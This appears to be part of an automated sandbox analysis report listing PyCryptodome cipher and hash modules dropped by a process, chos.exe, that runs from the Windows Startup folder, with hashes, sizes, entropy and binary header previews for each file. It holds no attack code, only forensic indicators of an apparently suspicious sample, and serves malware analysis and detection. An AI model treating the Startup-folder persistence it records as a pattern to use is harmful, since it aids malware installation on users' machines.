SHA-256:	FCE70B3DAFB39C6A4DB85D2D662CB9EB9C4861AA648AD7436E7F65663345D177
SHA-512:	A86B9DF163007277D26F2F732ECAB9DBCA8E860F8B5809784F46702D4CEA198824FDEF6AB98BA7DDC281E8791C10EABA002ABDA6F975323B36D5967E0443C1E4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." ....."... ......P.....................................................`.........................................pI.......J..d....p.......`..................(....B...............................B..8............@...............................text...( .......".................. ..`.rdata..<....@.......&..............@..@.data...H....P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..(............>..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_blowfish.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	20992
Entropy (8bit):	6.041302713678401
Encrypted:	false
SSDEEP:	384:kUX0JfbRz5MLZA0nmwzMDYpJgLa0Mp8NDBcxgprAM:6NbRzWXwDqgLa1uBfP
MD5:	B127CAE435AEB8A2A37D2A1BC1C27282
SHA1:	2A7BF8BF7F24B2381370BA6B41FB640EE42BDCCD
SHA-256:	538B1253B5929254ED92129FA0957DB26CDDF34A8372BA0BF19D20D01549ADA3
SHA-512:	4FE027E46D5132CA63973C67BD5394F2AC74DD4BBCFE93CB16136FAB4B6BF67BECB5A0D4CA359FF9426DA63CA81F793BBF1B79C8A9D8372C53DCB5796D17367E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....$...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text....".......$.................. ..`.rdata.......@... ...(..............@..@.data...H....`.......H..............@....pdata.......p.......J..............@..@.rsrc................N..............@..@.reloc..0............P..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_cast.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	6.530656045206549
Encrypted:	false
SSDEEP:	384:cEDwUBi9SPu71omZXmrfXA+UA10ol31tuXVYdAgYj:FsUBXmoEXmrXA+NNxWFYfo
MD5:	2E15AA6F97ED618A3236CFA920988142
SHA1:	A9D556D54519D3E91FA19A936ED291A33C0D1141
SHA-256:	516C5EA47A7B9A166F2226ECBA79075F1A35EFFF14D87E00006B34496173BB78
SHA-512:	A6C75C4A285753CC94E45500E8DD6B6C7574FB7F610FF65667F1BEC8D8B413FC10514B7D62F196C2B8D017C308C5E19E2AEF918021FA81D0CB3D8CED37D8549A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.:...:...:...3.j.>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...........................PE..d...W..f.........." .....$...>............................................................`..........................................h.......i..d...............................0....a...............................a..8............@...............................text....#.......$.................. ..`.rdata..:-...@.......(..............@..@.data...H....p.......V..............@....pdata...............X..............@..@.rsrc................\..............@..@.reloc..0............^..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_cbc.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.7080156150187396
Encrypted:	false
SSDEEP:	192:lF/1n7Guqaj0ktfEJwX1fYwCODR3lncqg0Gd6l:RGXkJEm1feODxDg0Gd6
MD5:	40390F2113DC2A9D6CFAE7127F6BA329
SHA1:	9C886C33A20B3F76B37AA9B10A6954F3C8981772
SHA-256:	6BA9C910F755885E4D356C798A4DD32D2803EA4CFABB3D56165B3017D0491AE2
SHA-512:	617B963816838D649C212C5021D7D0C58839A85D4D33BBAF72C0EC6ECD98B609080E9E57AF06FA558FF302660619BE57CC974282826AB9F21AE0D80FBAA831A1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...X..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......&..............@....pdata..X....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..(....p......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_cfb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	12800
Entropy (8bit):	5.159963979391524
Encrypted:	false
SSDEEP:	192:kblRgfeqfz0RP767fB4A84DgVD6eDcqgzbkLgmf:BwRj67p84Dg6eVgzbkLgmf
MD5:	899895C0ED6830C4C9A3328CC7DF95B6
SHA1:	C02F14EBDA8B631195068266BA20E03210ABEABC
SHA-256:	18D568C7BE3E04F4E6026D12B09B1FA3FAE50FF29AC3DEAF861F3C181653E691
SHA-512:	0B4C50E40AF92BC9589668E13DF417244274F46F5A66E1FC7D1D59BC281969BA319305BECEA119385F01CC4603439E4B37AFA2CF90645425210848A02839E3E7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^..6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...Jk.7?...J..7?..Rich6?..................PE..d...Y..f.........." ................P.....................................................`..........................................8......x9..d....`.......P..d............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......(..............@....pdata..d....P.......*..............@..@.rsrc........`......................@..@.reloc..(....p.......0..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ctr.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14848
Entropy (8bit):	5.270418334522813
Encrypted:	false
SSDEEP:	192:vktJ1gifqQGRk0IP73AdXdmEEEEEm9uhiFEQayDZVMcqgnF6+6Lg:vkdU1ID3AdXd49urQPDggnUjLg
MD5:	C4C525B081F8A0927091178F5F2EE103
SHA1:	A1F17B5EA430ADE174D02ECC0B3CB79DBF619900
SHA-256:	4D86A90B2E20CDE099D6122C49A72BAE081F60EB2EEA0F76E740BE6C41DA6749
SHA-512:	7C06E3E6261427BC6E654B2B53518C7EAA5F860A47AE8E80DC3F8F0FED91E122CB2D4632188DC44123FB759749B5425F426CD1153A8F84485EF0491002B26555
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r^z.6?..6?..6?..?G..2?..dJ..4?..}G..5?..6?...?..dJ..<?..dJ..>?..dJ..5?...J..7?...J..7?...J..7?...J..7?..Rich6?..........................PE..d...Y..f.........." ......... ......P.....................................................`.........................................`9.......:..d....`.......P...............p..(....1...............................1..8............0.. ............................text............................... ..`.rdata.......0....... ..............@..@.data........@.......0..............@....pdata.......P.......2..............@..@.rsrc........`.......6..............@..@.reloc..(....p.......8..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_des.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	56832
Entropy (8bit):	4.231032526864278
Encrypted:	false
SSDEEP:	384:0qcmHBeNL1dO/qHkpnYcZiGKdZHDLY84vnKAnK2rZA21agVF:fEiqHHx4vZDV
MD5:	F9E266F763175B8F6FD4154275F8E2F0
SHA1:	8BE457700D58356BC2FA7390940611709A0E5473
SHA-256:	14D2799BE604CBDC668FDE8834A896EEE69DAE0E0D43B37289FCCBA35CEF29EC
SHA-512:	EB3E37A3C3FF8A65DEF6FA20941C8672A8197A41977E35AE2DC6551B5587B84C2703758320559F2C93C0531AD5C9D0F6C36EC5037669DC5CE78EB3367D89877B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....6...................................................0............`.................................................\...d...............l............ ..0... ...............................@...8............P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...H...........................@....pdata..l...........................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_des3.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	4.252429732285762
Encrypted:	false
SSDEEP:	384:J4cmHBeIzNweVy/CHkRnYcZiGKdZHDLq80vnKAnKBrZGsURygUX:GEO6CHnX0vZb7
MD5:	DECF524B2D53FCD7D4FA726F00B3E5FC
SHA1:	E87C6ED4004F2772B888C5B5758AA75FE99D2F6F
SHA-256:	58F7053EE70467D3384C73F299C0DFD63EEF9744D61D1980D9D2518974CA92D4
SHA-512:	EAFF4FD80843743E61CE635FBADF4E5D9CF2C3E97F3C48350BD9E755F4423AC6867F9FE8746BD5C54E1402B18E8A55AEEF7ACA098C7CF4186DC4C1235EB35DF2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........PK..1%..1%..1%..I...1%.D$..1%.I$..1%..1$..1%.D ..1%.D!..1%.D&..1%..D-..1%..D%..1%..D...1%..D'..1%.Rich.1%.........................PE..d...X..f.........." .....8...................................................0............`.....................................................d............................ ..0... ...............................@...8............P...............................text...X7.......8.................. ..`.rdata......P.......<..............@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..0.... ......................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ecb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	4.690163963718492
Encrypted:	false
SSDEEP:	192:Yddz2KTnThIz0qfteRY4zp+D3PLui8p1cqgHCWt:k2E9RqfCXp+D3juRpLgiWt
MD5:	80BB1E0E06ACAF03A0B1D4EF30D14BE7
SHA1:	B20CAC0D2F3CD803D98A2E8A25FBF65884B0B619
SHA-256:	5D1C2C60C4E571B88F27D4AE7D22494BED57D5EC91939E5716AFA3EA7F6871F6
SHA-512:	2A13AB6715B818AD62267AB51E55CD54714AEBF21EC9EA61C2AEFD56017DC84A6B360D024F8682A2E105582B9C5FE892ECEBD2BEF8A492279B19FFD84BC83FA5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@................../....../...../......+.......*......-......&....................,....Rich...........................PE..d...X..f.........." ................P........................................p............`.........................................0'.......'..P....P.......@...............`..(....!...............................!..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...H....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..(....`.......&..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_eksblowfish.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	6.1215844022564285
Encrypted:	false
SSDEEP:	384:nUX0JfbRwUtPMbNv37t6K5jwbDEpJgLa0Mp8xCkgJrAm:jNbRw8EbxwKBwbD+gLa1nh
MD5:	3727271FE04ECB6D5E49E936095E95BC
SHA1:	46182698689A849A8C210A8BF571D5F574C6F5B1
SHA-256:	3AF5B35DCD5A3B6C7E88CEE53F355AAFFF40F2C21DABD4DE27DBB57D1A29B63B
SHA-512:	5BED1F4DF678FE90B8E3F1B7C4F68198463E579209B079CB4A40DCAC01CE26AA2417DBE029B196F6F2C6AFAD560E2D1AF9F089ABE37EAD121CA10EE69D9659ED
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...W..f.........." .....(...0......P.....................................................`.........................................0Y.......Y..d............p..................0....Q...............................R..8............@...............................text...H'.......(.................. ..`.rdata.......@... ...,..............@..@.data...H....`.......L..............@....pdata.......p.......N..............@..@.rsrc................R..............@..@.reloc..0............T..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ocb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17920
Entropy (8bit):	5.293810509074883
Encrypted:	false
SSDEEP:	384:4PHoDUntQjNB+/yw/pogeXOvXoTezczOo3p9iJgDQ3iNgnVbwhA:dUOhBcDRogeXOfoTezcio3pUJgDQ3i+
MD5:	78AEF441C9152A17DD4DC40C7CC9DF69
SHA1:	6BB6F8426AFA6522E647DFC82B1B64FAF3A9781F
SHA-256:	56E4E4B156295F1AAA22ECB5481841DE2A9EB84845A16E12A7C18C7C3B05B707
SHA-512:	27B27E77BE81B29D42359FE28531225383860BCD19A79044090C4EA58D9F98009A254BF63585979C60B3134D47B8233941ABB354A291F23C8641A4961FA33107
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Y..f.........." .....(... ......P.....................................................`.........................................pI......lJ..d....p.......`..................(....A...............................A..8............@...............................text....'.......(.................. ..`.rdata.......@.......,..............@..@.data........P.......<..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Cipher\_raw_ofb.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	4.862619033406922
Encrypted:	false
SSDEEP:	96:0Ga+F/1NtJ9t4udqaj01rlALnNNJSS2sP+YEdMN+F9FdKaWDULk+VOmWbucX6gR7:PF/1n7Guqaj0ktfEON+bMDUlJcqg0Gd
MD5:	19E0ABF76B274C12FF624A16713F4999
SHA1:	A4B370F556B925F7126BF87F70263D1705C3A0DB
SHA-256:	D9FDA05AE16C5387AB46DC728C6EDCE6A3D0A9E1ABDD7ACB8B32FC2A17BE6F13
SHA-512:	D03033EA5CF37641FBD802EBEB5019CAEF33C9A78E01519FEA88F87E773DCA92C80B74BA80429B530694DAD0BFA3F043A7104234C7C961E18D48019D90277C8E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...Y..f.........." ................P.....................................................`..........................................8.......8..d....`.......P..X............p..(....1...............................1..8............0...............................text............................... ..`.rdata.......0......................@..@.data...H....@.......$..............@....pdata..X....P.......&..............@..@.rsrc........`.......*..............@..@.reloc..(....p.......,..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_BLAKE2b.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.227045547076371
Encrypted:	false
SSDEEP:	192:saF/1n7Guqaj0ktrE8o2o+V2rQnjt1wmg9jtveDn4clG6VcqgOvgdd:swGXkFE8Zo+AojO9jZeDf5rgOvgz
MD5:	309D6F6B0DD022EBD9214F445CAC7BB9
SHA1:	ABD22690B7AD77782CFC0D2393D0C038E16070B0
SHA-256:	4FBE188C20FB578D4B66349D50AA6FFE4AB86844FB6427C57738F36780D1E2E2
SHA-512:	D1951FE92F83E7774E8E877815BED6E6216D56EF18B7F1C369D678CB6E1814243659E9FA7ABC0D22FB5B34A9D50A51D5A89BA00AE1FDD32157FD0FF9902FB4B7
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...x........................... ..`.rdata.......0....... ..............@..@.data...H....@......................@....pdata..@....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_BLAKE2s.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.176369829782773
Encrypted:	false
SSDEEP:	192:rF/1n7Guqaj0ktrESsrUW+SBjsK5tcQmEreD2mf1AoxkVcqgOvgXQ:rGXkFE/UW575tA2eDp1Ao2rgOvgX
MD5:	D54FEB9A270B212B0CCB1937C660678A
SHA1:	224259E5B684C7AC8D79464E51503D302390C5C9
SHA-256:	032B83F1003A796465255D9B246050A196488BAC1260F628913E536314AFDED4
SHA-512:	29955A6569CA6D039B35BB40C56AEEB75FC765600525D0B469F72C97945970A428951BAB4AF9CD21B3161D5BBA932F853778E2674CA83B14F7ABA009FA53566F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ................P.....................................................`..........................................8.......9..d....`.......P..@............p..(....2...............................2..8............0...............................text...h........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata..@....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_MD2.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14336
Entropy (8bit):	5.047563322651927
Encrypted:	false
SSDEEP:	384:6alCvH32p3/2pnEhKnLg9yH8puzoFaPERIQAvHD9CIg5kP:5CvHmp3OpnEhmLg9yH8puzoFaPERIQgI
MD5:	52DCD4151A9177CF685BE4DF48EA9606
SHA1:	F444A4A5CBAE9422B408420115F0D3FF973C9705
SHA-256:	D54375DC0652358A6E4E744F1A0EAEEAD87ACCD391A20D6FF324FE14E988A122
SHA-512:	64C54B89F2637759309ECC6655831C3A6755924ED70CBC51614061542EB9BA9A8AECF6951EB3AB92447247DC4D7D846C88F4957DBBE4484A9AB934343EE27178
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...Q..f.........." ......... ......P.....................................................`.........................................@9.......9..d....`.......P..(............p..(....2...............................2..8............0...............................text...X........................... ..`.rdata..@....0......................@..@.data...x....@......................@....pdata..(....P.......0..............@..@.rsrc........`.......4..............@..@.reloc..(....p.......6..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_MD4.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.09893680790018
Encrypted:	false
SSDEEP:	192:xsiXeqVb0lwbH4P01sAD7I/9hAkwDWzBEbcqgqLg:valqH4M1sAD7KvpwDFtgqLg
MD5:	F929B1A3997427191E07CF52AC883054
SHA1:	C5EA5B68586C2FB09E5FDD20D4DD616D06F5CBA6
SHA-256:	5386908173074FABD95BF269A9DF0A4E1B21C0576923186F449ABF4A820F6A8E
SHA-512:	2C79DBCE2C21214D979AB86DD989D41A3AFA7FCB7F3B79BA9974E2EE8F832DD7CA20C1C87C0C380DB037D776FE6D0851D60AD55A08AFDE0003B7E59214DD2F3B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ................P.....................................................`.........................................08.......8..d....`.......P..(............p..(....1...............................2..8............0...............................text............................... ..`.rdata..0....0......................@..@.data........@.......,..............@....pdata..(....P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_MD5.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	5.451865349855574
Encrypted:	false
SSDEEP:	384:KfwogDHER1wuiDSyoGTgDZOviNgEPrLg:ugDHELwuiDScTgDwi+EP
MD5:	1FA5E257A85D16E916E9C22984412871
SHA1:	1AC8EE98AD0A715A1B40AD25D2E8007CDC19871F
SHA-256:	D87A9B7CAD4C451D916B399B19298DC46AAACC085833C0793092641C00334B8E
SHA-512:	E4205355B647C6E28B7E4722328F51DC2EB3A109E9D9B90F7C53D7A80A5A4B10E40ABDDAB1BA151E73EF3EB56941F843535663F42DCE264830E6E17BB659EADF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ..... ..........P.....................................................`..........................................8......`9..d....`.......P..X............p..(....1...............................1..8............0...............................text............ .................. ..`.rdata.......0.......$..............@..@.data........@.......2..............@....pdata..X....P.......4..............@..@.rsrc........`.......8..............@..@.reloc..(....p.......:..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_RIPEMD160.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	13824
Entropy (8bit):	5.104245335186531
Encrypted:	false
SSDEEP:	192:3F/1n7Guqaj0kt7/Ev9kt0Qwac6QzD8iD0QocqgI4G0S:nGXkd/EvGt9wacNDvAgI4v
MD5:	FAD578A026F280C1AE6F787B1FA30129
SHA1:	9A3E93818A104314E172A304C3D117B6A66BEB55
SHA-256:	74A1FF0801F4704158684267CD8E123F83FB6334FE522C1890AC4A0926F80AB1
SHA-512:	ACF8F5B382F3B4C07386505BBDCAF625D13BCC10AA93ED641833E3548261B0AD1063E2F59BE2FCD2AFAF3D315CB3FC5EB629CEFC168B33CFD65A3A6F1120F7FF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.g.:...:...:...3...>...h...8...q...9...:.......h...1...h...2...h...9.......;.......;.......;.......;...Rich:...................PE..d...U..f.........." ......... ......P.....................................................`..........................................9.......:..d....`.......P...............p..(...@3..............................`3..8............0...............................text...H........................... ..`.rdata.......0......................@..@.data...H....@.......,..............@....pdata.......P......................@..@.rsrc........`.......2..............@..@.reloc..(....p.......4..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA1.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17920
Entropy (8bit):	5.671305741258107
Encrypted:	false
SSDEEP:	384:APHoDUntQj0sKhDOJ+0QPSfu6rofDjiZzgE+kbwb:VUOYsKNO466DjoUE+
MD5:	556E6D0E5F8E4DA74C2780481105D543
SHA1:	7A49CDEF738E9FE9CD6CD62B0F74EAD1A1774A33
SHA-256:	247B0885CF83375211861F37B6DD1376AED5131D621EE0137A60FE7910E40F8B
SHA-512:	28FA0CE6BDBCC5E95B80AADC284C12658EF0C2BE63421AF5627776A55050EE0EA0345E30A15B744FC2B2F5B1B1BBB61E4881F27F6E3E863EBAAEED1073F4CDA1
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h..9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...R..f.........." ...............P.....................................................`..........................................H......hI..d....p.......`..X...............(....A...............................A..8............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data........P.......<..............@....pdata..X....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..(............D..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA224.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	5.878701941774916
Encrypted:	false
SSDEEP:	384:EJWo4IRCGHX1KXqHGcvYHp5RYcARQOj4MSTjqgPmJD1OhgkxEv:EcIRnHX1P/YtswvaD1Rk
MD5:	2F2655A7BBFE08D43013EDDA27E77904
SHA1:	33D51B6C423E094BE3E34E5621E175329A0C0914
SHA-256:	C734ABBD95EC120CB315C43021C0E1EB1BF2295AF9F1C24587334C3FCE4A5BE1
SHA-512:	8AF99ACC969B0E560022F75A0CDCAA85D0BDEADADEACD59DD0C4500F94A5843EA0D4107789C1A613181B1F4E5252134A485EF6B1D9D83CDB5676C5FEE4D49B90
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.G.:.).:.).:.).3...>.).h.(.8.).q.(.9.).:.(...).h.,.1.).h.-.2.).h.*.9.)...!.;.)...).;.).....;.)...+.;.).Rich:.).........................PE..d...S..f.........." .....6... ......P.....................................................`.........................................@Z......([..d............p..................(....R...............................R..8............P...............................text....5.......6.................. ..`.rdata..x....P.......:..............@..@.data........`.......J..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc..(............R..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\Crypto\Hash\_SHA256.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21504
Entropy (8bit):	5.881781476285865
Encrypted:	false
SSDEEP:	384:EJWo4IRCGHXfKXqHGcvYHp5RYcARQOj4MSTjqgPmJD12gkxEv:EcIRnHXfP/YtswvaD1zk
MD5:	CDE035B8AB3D046B1CE37EEE7EE91FA0
SHA1:	4298B62ED67C8D4F731D1B33E68D7DC9A58487FF
SHA-256:	16BEA322D994A553B293A724B57293D57DA62BC7EAF41F287956B306C13FD972
SHA-512:	C44FDEE5A210459CE4557351E56B2D357FD4937F8EC8EACEAB842FEE29761F66C2262FCBAAC837F39C859C67FA0E23D13E0F60B3AE59BE29EB9D8ABAB0A572BB
Malicious:	false
